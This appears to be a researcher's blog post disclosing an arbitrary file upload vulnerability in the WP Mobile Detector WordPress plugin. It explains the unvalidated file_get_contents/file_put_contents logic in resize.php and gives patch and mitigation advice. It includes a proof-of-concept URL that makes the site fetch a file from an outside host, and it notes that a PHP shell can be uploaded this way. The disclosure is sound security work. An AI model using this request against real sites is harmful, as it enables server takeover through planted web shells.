I am Aaditya Purani and i am going to show a POC of WP Mobile Detector vulnerability <=3.5 Arbitrary file upload vulnerability. WP Mobile detector Plugin automatically detects standard and advanced mobile devices and displays a compatible wordpress Mobile themes. Before some years, we also had an Arbitrary file upload vulnerability in this Same plugin in timthumb.php and this is another Exploit in 2016 .
Still more than 10,000 users are vulnerable to this [!]
This is a 0day Arbitrary File upload vulnerability which existed in WP Mobile detector <=3.5 . I have tested this on Latest WordPress CMS Version.
Let’s begin with it, The vulnerable file in this Plugin is located in /wp-content/plugins/wp-mobile-detector/resize.php .
Let’s analyze the code of resize.php. The code in these 4 lines first checks does the file exists based on the REQUEST Made via
src ( GET Method or POST Method ).
Moving to the else statement, the
file_get_contents() function is used to gets the file’s content which we can placed as a REQUEST in
src parameter either via GET or POST . In my older blog post, i showed an example of abusing
file_get_contents() function which was leading to SSRF (Server Side Request Forgeries ). This can be abused if allow_url_fopen is Enabled on the server. In that case, the Attacker can load up whatever file they want to the website. After getting the contents of our requested file, it uses
file_put_contents() to write to the path variable which is pointing to /cache/$basename . The basename would be same as the file you fetched.
Joining the pieces, we can easily know the it’s a simple bug in the code here it neither validates the file nor sanitizes the input from untrusted sources. If No server security checks are performed, than easily an Hacker can misuse resize function to Arbitrary file upload vulnerability.
Proof of Concept:
Below is the complete POC of this vulnerability.
http://%5Bwordpress site path]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of File to upload]
You can also check by feeding an external image to
src variable like http://xyz.com/smile.png and it would be saved to
http://%5BWordpress site path]/wp-content/plugins/wp-mobile-detector/cache/[file name]
In this case smile.png, but if you look carefully in the code there is also a way to upload PHP Shell script using the same. 🙂
To patch this, you have to quickly update the Plugin to 3.7 Version either from Admin dashboard or you can visit https://wordpress.org/plugins/wp-mobile-detector/ and go to Installation section. Another option is to disable the plugin and the Third option is to disable PHP Execution in the /wp-mobile-detector/cache subdirectory. But that’s not a feasible option as there can be many attack vectors if you disable only PHP. You can either install a Firewall or Monitoring on your website to prevent such 0 days in future
So the Vendor have decided to whitelist some extensions like png, gif, jpg, svg etc & performing a check on it to filter other extensions !
Take care till than. 😀